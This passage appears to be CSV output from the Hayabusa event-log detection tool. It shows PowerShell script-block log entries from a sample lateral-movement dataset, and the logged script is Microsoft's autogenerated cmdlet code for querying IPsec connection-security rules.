[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 
'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewP",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) 
$__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if 